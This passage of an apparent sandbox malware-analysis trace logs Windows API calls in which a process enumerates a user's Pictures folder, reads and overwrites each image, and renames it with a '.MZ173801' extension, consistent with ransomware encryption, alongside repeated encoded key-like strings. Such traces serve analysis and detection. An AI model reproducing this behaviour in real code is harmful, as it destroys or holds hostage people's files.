0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0113.896] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0113.896] GetCurrentThreadId () returned 0x1358 [0113.896] GetCurrentThreadId () returned 0x1358 [0113.896] GetCurrentThreadId () returned 0x1358 [0113.896] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0113.896] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0113.897] GetCurrentThreadId () returned 0x1358 [0113.897] GetCurrentThreadId () returned 0x1358 [0113.897] GetCurrentThreadId () returned 0x1358 [0113.897] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Bsuy48bD0S.png" (normalized: "c:\\users\\fd1hvy\\pictures\\bsuy48bd0s.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f8 [0113.897] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0113.897] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0113.897] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x4fae [0113.897] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0113.897] ReadFile (in: hFile=0x3f8, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x4fae, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x4fae, lpOverlapped=0x0) returned 1 [0113.956] CloseHandle (hObject=0x3f8) returned 1 [0113.956] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Bsuy48bD0S.png" (normalized: "c:\\users\\fd1hvy\\pictures\\bsuy48bd0s.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f8 [0113.957] WriteFile (in: hFile=0x3f8, lpBuffer=0x2437b60*, nNumberOfBytesToWrite=0x4fae, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2437b60*, lpNumberOfBytesWritten=0x19f9bc*=0x4fae, lpOverlapped=0x0) returned 1 [0113.959] CloseHandle (hObject=0x3f8) returned 1 [0113.960] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\Bsuy48bD0S.png" (normalized: "c:\\users\\fd1hvy\\pictures\\bsuy48bd0s.png"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\Bsuy48bD0S.png.MZ173801" (normalized: "c:\\users\\fd1hvy\\pictures\\bsuy48bd0s.png.mz173801")) returned 1 [0113.961] GetCurrentThreadId () returned 0x1358 [0113.961] GetCurrentThreadId () returned 0x1358 [0113.961] GetCurrentThreadId () returned 0x1358 [0113.961] GetCurrentThreadId () returned 0x1358 [0113.961] GetCurrentThreadId () returned 0x1358 [0113.961] GetCurrentThreadId () returned 0x1358 [0113.961] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4543, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51278b1d, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Camera Roll", cAlternateFileName="CAMERA~1")) returned 1 [0113.961] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c6a54e0, ftCreationTime.dwHighDateTime=0x1d5e490, ftLastAccessTime.dwLowDateTime=0x128508a0, ftLastAccessTime.dwHighDateTime=0x1d5e90e, ftLastWriteTime.dwLowDateTime=0x128508a0, ftLastWriteTime.dwHighDateTime=0x1d5e90e, nFileSizeHigh=0x0, nFileSizeLow=0x558d, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Ch3abfsCtWfA_.jpg", cAlternateFileName="CH3ABF~1.JPG")) returned 1 [0113.961] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.961] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.961] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Ch3abfsCtWfA_.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\ch3abfsctwfa_.jpg"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c6a54e0, ftCreationTime.dwHighDateTime=0x1d5e490, ftLastAccessTime.dwLowDateTime=0x128508a0, ftLastAccessTime.dwHighDateTime=0x1d5e90e, ftLastWriteTime.dwLowDateTime=0x128508a0, ftLastWriteTime.dwHighDateTime=0x1d5e90e, nFileSizeHigh=0x0, nFileSizeLow=0x558d)) returned 1 [0113.961] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0113.961] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0113.962] GetCurrentThreadId () returned 0x1358 [0113.962] GetCurrentThreadId () returned 0x1358 [0113.962] GetCurrentThreadId () returned 0x1358 [0113.962] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0113.962] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0113.962] GetCurrentThreadId () returned 0x1358 [0113.962] GetCurrentThreadId () returned 0x1358 [0113.962] GetCurrentThreadId () returned 0x1358 [0113.962] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Ch3abfsCtWfA_.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\ch3abfsctwfa_.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f8 [0113.963] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0113.963] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0113.963] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x558d [0113.963] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0113.963] ReadFile (in: hFile=0x3f8, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x558d, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x558d, lpOverlapped=0x0) returned 1 [0113.964] CloseHandle (hObject=0x3f8) returned 1 [0113.964] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Ch3abfsCtWfA_.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\ch3abfsctwfa_.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f8 [0113.965] WriteFile (in: hFile=0x3f8, lpBuffer=0x2437b60*, nNumberOfBytesToWrite=0x558d, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2437b60*, lpNumberOfBytesWritten=0x19f9bc*=0x558d, lpOverlapped=0x0) returned 1 [0113.966] CloseHandle (hObject=0x3f8) returned 1 [0113.968] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\Ch3abfsCtWfA_.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\ch3abfsctwfa_.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\Ch3abfsCtWfA_.jpg.MZ173801" (normalized: "c:\\users\\fd1hvy\\pictures\\ch3abfsctwfa_.jpg.mz173801")) returned 1 [0113.968] GetCurrentThreadId () returned 0x1358 [0113.968] GetCurrentThreadId () returned 0x1358 [0113.968] GetCurrentThreadId () returned 0x1358 [0113.968] GetCurrentThreadId () returned 0x1358 [0113.968] GetCurrentThreadId () returned 0x1358 [0113.968] GetCurrentThreadId () returned 0x1358 [0113.968] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44053085, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44053085, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce2f1526, 